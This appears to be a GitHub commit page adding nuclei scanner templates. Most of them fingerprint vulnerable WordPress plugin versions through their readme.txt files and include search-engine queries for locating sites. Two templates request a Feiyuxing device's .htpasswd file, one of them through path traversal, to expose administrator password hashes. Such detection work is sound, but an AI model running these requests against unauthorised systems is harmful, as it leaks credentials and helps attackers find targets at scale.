Skip to content

Commit

Permalink
20241221
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 21, 2024
1 parent 6b49cf6 commit 29a16de
Show file tree
Hide file tree
Showing 476 changed files with 28,019 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241220
20241221
474 changes: 474 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

59 changes: 59 additions & 0 deletions poc/auth/authentication-via-otp-using-firebase.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: authentication-via-otp-using-firebase-9097fcd5b178e75d87723dfdbc4c911b

info:
name: >
Firebase OTP Authentication <= 1.0.1 - Missing Authorization to Privilege Escalation
author: topscoder
severity: high
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8607acb6-743b-4a32-9941-27ce72379f0a?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/authentication-via-otp-using-firebase/"
google-query: inurl:"/wp-content/plugins/authentication-via-otp-using-firebase/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,authentication-via-otp-using-firebase,high

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/authentication-via-otp-using-firebase/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "authentication-via-otp-using-firebase"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.0.1')
59 changes: 59 additions & 0 deletions poc/auth/better-wp-login-page.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: better-wp-login-page-6e43930d2bdbe3c110384cb22d290456

info:
name: >
Better WP Login Page <= 1.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/892cb187-95b6-4df7-a0dc-4db6d8cee902?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/better-wp-login-page/"
google-query: inurl:"/wp-content/plugins/better-wp-login-page/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,better-wp-login-page,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/better-wp-login-page/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "better-wp-login-page"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.1.2')
19 changes: 19 additions & 0 deletions poc/auth/feiyuxing-web-htpasswd-infoleak.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
id: feiyuxing-web-htpasswd-infoleak

info:
name: feiyuxing-web-htpasswd-infoleak
author: PokerSec
severity: high
metadata:
fofasearch: body="js/select2css.js"

http:
- raw:
- |
GET /.htpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"$1$$") && contains_all(body,"admin")
19 changes: 19 additions & 0 deletions poc/auth/feiyuxing-web-js-htpasswd-infoleak.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
id: feiyuxing-web-js-htpasswd-infoleak

info:
name: feiyuxing-web-js-htpasswd-infoleak
author: PokerSec
severity: high
metadata:
fofasearch: body="js/select2css.js" || title=="飞鱼星企业级智能上网行为管理系统"

http:
- raw:
- |
GET /js/../.htpasswd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"$1$$") && contains_all(body,"admin")
59 changes: 59 additions & 0 deletions poc/auth/gaxx-keywords.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: gaxx-keywords-1643b95f00dd189ad99da6edffb24782

info:
name: >
Gaxx Keywords <= 0.2 - Cross-Site Request Forgery to Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7061781d-999b-47a7-b4b2-f0335c6247f8?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/gaxx-keywords/"
google-query: inurl:"/wp-content/plugins/gaxx-keywords/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,gaxx-keywords,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/gaxx-keywords/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "gaxx-keywords"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 0.2')
59 changes: 59 additions & 0 deletions poc/auth/push-monkey-desktop-push-notifications.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: push-monkey-desktop-push-notifications-08a320e54df07e056df6d0f01f123316

info:
name: >
Push Monkey Pro – Web Push Notifications and WooCommerce Abandoned Cart <= 3.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/adfe66d7-5402-447f-bca2-8de5b6447cbb?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/push-monkey-desktop-push-notifications/"
google-query: inurl:"/wp-content/plugins/push-monkey-desktop-push-notifications/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,push-monkey-desktop-push-notifications,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/push-monkey-desktop-push-notifications/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "push-monkey-desktop-push-notifications"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 3.9')
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: reactflow-session-replay-heatmap-38be705ad3ea6bee0782af8bbd1e1f3a

info:
name: >
Reactflow Visitor Recording and Heatmaps <= 1.0.10 - Cross-Site Request Forgery to Reflected Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/reactflow-session-replay-heatmap/"
google-query: inurl:"/wp-content/plugins/reactflow-session-replay-heatmap/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,reactflow-session-replay-heatmap,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/reactflow-session-replay-heatmap/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "reactflow-session-replay-heatmap"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.0.10')
Loading

0 comments on commit 29a16de

Please sign in to comment.